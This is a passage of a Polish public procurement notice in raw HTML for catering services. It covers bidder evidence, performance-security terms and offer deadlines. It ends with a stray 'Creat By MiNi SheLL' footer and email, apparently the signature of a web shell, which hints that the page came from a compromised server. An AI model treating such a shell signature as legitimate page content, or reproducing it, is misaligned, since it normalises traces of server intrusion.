najmniej 1 usługę świadczenia usług cateringowych o wartości zamówienia/usługi<br/> co najmniej: 100 000,00 PLN brutto (słownie: sto tysięcy złotych brutto). <br/>Jedna usługa oznacza jedną umowę. <br/>W odniesieniu do usług powtarzających się lub ciągłych - (tj. usług wykonywanych/ niezakończonych) weryfikacja w zakresie spełnienia warunku odnoszącego się do warunku jak i wartości usługi, zostanie dokonana na dzień upływu składania ofert. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">3.	Podmiotowe środki dowodowe wymagane od Wykonawcy to:<br/>1)	oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z 16 lutego 2007 o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia <br/>o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej, stanowiące załącznik nr 6 do SWZ;<br/>2)	odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji <br/>i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzone nie wcześniej niż 3 miesiące przed złożeniem oferty, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">dotyczy tylko Części nr II<br/>3)	wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie zgodnie z warunkiem określonym w Rozdziale VII ust. 4 lit. b) SWZ dla Części nr 2 wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane w okresie ostatnich 3 miesięcy - załącznik nr 4 do SWZ;</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawca, którego Oferta została wybrana jako najkorzystniejsza, zobowiązany będzie przed zawarciem Umowy do wniesienia zabezpieczenia należytego wykonania umowy, które stanowi 2 % maksymalnej wartości nominalnej zobowiązania wynikającego z danej umowy – Część nr 1 i Część nr 2.<br/>2.	Zabezpieczenie może być wnoszone według wyboru wykonawcy w jednej lub w kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;<br/>3)	gwarancjach bankowych;<br/>4)	gwarancjach ubezpieczeniowych;<br/>5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>3.	Zabezpieczenie wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: PL 92 1130 1017 0019 9006 5420 0006, Kod SWIFT Bank Gospodarstwa Krajowego: GOSKPLPW, podaniem tytułu: „Zabezpieczenie należytego wykonania umowy: postępowanie ZP.26.8.2023.1 – Część nr 1 lub Część nr 2“<br/>4.	Wniesienie zabezpieczenia w pieniądzu Zamawiający uznaje za skuteczne, jeżeli jest ono wniesione tj. znajdzie się na rachunku bankowym Zamawiającego przed upływem terminu zawarcia umowy.<br/>5.	Jeżeli zabezpieczenie wniesiono w pieniądzu, Zamawiający przechowuje je na oprocentowanym rachunku bankowym. Zamawiający zwraca zabezpieczenie wniesione w pieniądzu wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszt prowadzenia tego rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy Wykonawcy.<br/>6.	Zabezpieczenie wniesione w formach, o których mowa w ust. 2 pkt 2-5 musi zostać <br/>złożone przed upływem terminu wyznaczonego na podpisanie umowy.<br/>7.	Zabezpieczenie wnoszone w formach, o których mowa w ust. 2 pkt 2-5 powinno: <br/>1)	zawierać określenie kwoty poręczenia lub gwarancji;<br/>2)	zawierać wskazanie gwaranta lub poręczyciela;<br/>3)	wskazanie beneficjenta gwarancji lub poręczenia, tj. Instytut Solidarności i Męstwa im. Witolda Pileckiego.<br/>4)	zawierać postanowienie, iż odpowiednio poręczyciel lub gwarant zobowiązuje się bezwarunkowo oraz na pierwsze żądanie do zapłaty pełnej kwoty zabezpieczenia na <br/>rzecz beneficjenta, najpóźniej w terminie do 30 dni;<br/>5)	być nieodwoływalne.<br/>8.	Warunki zwrotu zabezpieczenia określone zostały w treści projektowanych postanowień umowy w sprawie zamówienia publicznego, stanowiących załącznik nr 8 A i 8 B do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-04-18 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-04-18 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-05-17</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com